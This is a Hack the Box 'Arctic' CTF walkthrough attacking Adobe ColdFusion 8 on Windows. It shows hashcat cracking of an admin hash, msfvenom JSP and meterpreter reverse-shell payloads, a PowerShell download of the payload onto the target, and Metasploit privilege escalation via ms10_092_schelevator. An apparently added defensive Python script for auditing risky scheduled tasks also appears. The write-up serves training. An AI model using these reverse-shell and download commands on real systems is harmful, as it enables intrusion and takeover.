
Hack the Box – Arctic Walkthrough

Today, we’re going to solve another CTF machine, “Arctic”. It is now a retired box and is accessible to VIP members.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Easy


  • Getting user
  • Getting root


As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -Pn --disable-arp-ping -oA

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown


Nmap reveals an unknown service running on port 8500 and if we browse the page

If we browse the CFIDE/ and take a look inside administrator/ it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.

The first thing I did was test basic creds I could think of, such as admin:admin/admin:administrator. That didn’t work, so I checked the page source and inspected the input fields, but it was useless.

After that, Google for “Adobe Coldfusion 8 CVE”


Crack SHA1 Using Hashcat

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Cracked: happyday

Go to Debugging & Logging > Scheduled Tasks

Let’s schedule a new task.


This gives us the ability to download a file from a web server and save it locally. Under Server Settings > Mapping, we can verify the CFIDE path. Since our target machine is Windows, we have to create a JSP reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1337 -f raw > shell.jsp

Task Name: Shell
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task, we got a reverse shell.

The user flag can be obtained from C:\Users\tolis\Desktop\user.txt
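
From the defender's side, the scheduled-task step above leaves a reviewable artifact: a task that saves fetched content as a server-executable file under the web root. The following is an added example, not part of the original walkthrough; the record fields (name, url, save_to), the extension list and the sample entries are constructed assumptions. It audits task definitions for that pattern after normalising Windows paths.

```python
import ntpath  # Windows path rules, usable on any OS

# Assumption: web root as shown in the walkthrough's task settings.
WEB_ROOT = r"C:\ColdFusion8\wwwroot"
# Assumption: extensions this server executes on request; tune per deployment.
EXECUTABLE_EXTS = {".jsp", ".cfm", ".cfml", ".cfc"}


def canonical(path):
    """Resolve '..', unify separators and case, drop trailing dots/spaces
    (Windows ignores them), so lookalike paths compare equal."""
    return ntpath.normpath(path.replace("/", "\\")).rstrip(". ").lower()


def risky_tasks(tasks, web_root=WEB_ROOT):
    """Return (task name, canonical path) for every task that saves its
    fetched output as a server-executable file under the web root."""
    root = canonical(web_root) + "\\"
    findings = []
    for task in tasks:
        save_to = task.get("save_to")
        if not save_to:          # task does not write its output to disk
            continue
        path = canonical(save_to)
        ext = ntpath.splitext(path)[1]
        if path.startswith(root) and ext in EXECUTABLE_EXTS:
            findings.append((task["name"], path))
    return findings


# Constructed sample records (hypothetical field names, documentation addresses).
SAMPLE_TASKS = [
    {"name": "Shell", "url": "http://192.0.2.10/shell.jsp",
     "save_to": r"C:\ColdFusion8\wwwroot\CFIDE\shell.jsp"},
    {"name": "nightly-report", "url": "http://192.0.2.20/report",
     "save_to": r"D:\reports\nightly.html"},
    {"name": "csv-export", "url": "http://192.0.2.20/export",
     "save_to": r"C:\ColdFusion8\wwwroot\export\data.csv"},
    {"name": "old-copy", "url": "http://192.0.2.20/a",
     "save_to": r"C:\ColdFusion8\wwwroot_backup\old.jsp"},
    {"name": "health-check", "url": "http://192.0.2.20/ping", "save_to": ""},
    {"name": "updater", "url": "http://192.0.2.30/u",
     "save_to": r"C:/ColdFusion8/logs/../wwwroot/CFIDE/Update.JSP. "},
]

if __name__ == "__main__":
    for name, path in risky_tasks(SAMPLE_TASKS):
        print(f"REVIEW task {name!r}: writes executable content to {path}")
```

Only the "Shell" and "updater" records are reported; the CSV export, the sibling wwwroot_backup directory and the task with no output file are left alone.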

Privilege Escalation

Since we have a low-privilege shell, we can try upgrading to a proper shell and then go for privilege escalation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Transfer our shell.exe file to the target box using PowerShell.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

And we got a proper low-privilege reverse shell.

Since we don’t know what to exploit for privilege escalation, we’ll do some enumeration; the easiest way to do that in Metasploit is the local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got a bunch of suggestions through the x86 shell, but let’s see what we get through an x64 shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shellx64.exe

Now that we’re on x64, let’s run local_exploit_suggester again.

Not much of a difference. Let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Looks like it worked!

Noor Qureshi
